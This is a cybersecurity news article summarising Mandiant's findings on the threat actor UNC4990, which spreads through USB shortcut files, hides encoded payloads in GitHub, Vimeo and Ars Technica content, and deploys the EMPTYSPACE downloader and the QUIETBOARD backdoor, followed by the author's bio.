Cybersecurity firm Mandiant recently uncovered a financially motivated threat actor, UNC4990, utilizing USB devices for initial infections. The group is exploiting legitimate online platforms such as GitHub, Vimeo, and Ars Technica. The threat actor cleverly hides encoded payloads within seemingly benign content on these platforms, evading suspicion and leveraging trusted content delivery networks.
A Look into UNC4990 USB-Based Attacks
The attackers initiate their campaign through USB devices containing malicious LNK shortcut files, according to the report. When victims inadvertently execute the shortcut, a PowerShell script named explorer.ps1 is activated. This script downloads an intermediary payload, which decodes into a URL for fetching the malware downloader named ‘EMPTYSPACE.’
UNC4990 employs various hosting methods for intermediary payloads, including encoded text files on GitHub and GitLab. However, they have shifted strategies to abuse Vimeo and Ars Technica for hosting Base64 encoded and AES-encrypted string payloads. Notably, the attackers don’t exploit vulnerabilities in these platforms but utilize regular features like Ars Technica forum profiles and Vimeo video descriptions.
These payloads, harmless text strings on the hosting platforms, play a critical role in the attack chain, facilitating the download and execution of malware. By embedding payloads within legitimate content and using reputable platforms, UNC4990 evades suspicion and takes advantage of trusted networks, making it challenging for security systems to flag them as suspicious.
The UNC4990 attack chain progresses with the deployment of QUIETBOARD, a sophisticated backdoor with diverse capabilities. This multi-component backdoor, once activated, executes commands from the command and control (C2) server, alters clipboard content for cryptocurrency theft, infects USB drives to spread malware, captures screenshots for information theft, and gathers detailed system and network information. QUIETBOARD demonstrates persistence across system reboots and supports the addition of new functionalities through extra modules.
Despite conventional prevention measures, USB-based malware continues to pose a significant threat, serving as an effective propagation medium for cybercriminals. The unique tactic of UNC4990, leveraging seemingly innocuous platforms for intermediate payloads, challenges conventional security paradigms and underscores the need for continual vigilance in the ever-evolving landscape of cybersecurity.
Milena Dimitrova
An inspired writer and content manager who has been with SensorsTechForum since the project started. A professional with 10+ years of experience in creating engaging content. Focused on user privacy and malware development, she strongly believes in a world where cybersecurity plays a central role. If common sense makes no sense, she will be there to take notes. Those notes may later turn into articles! Follow Milena @Milenyim
Follow Me: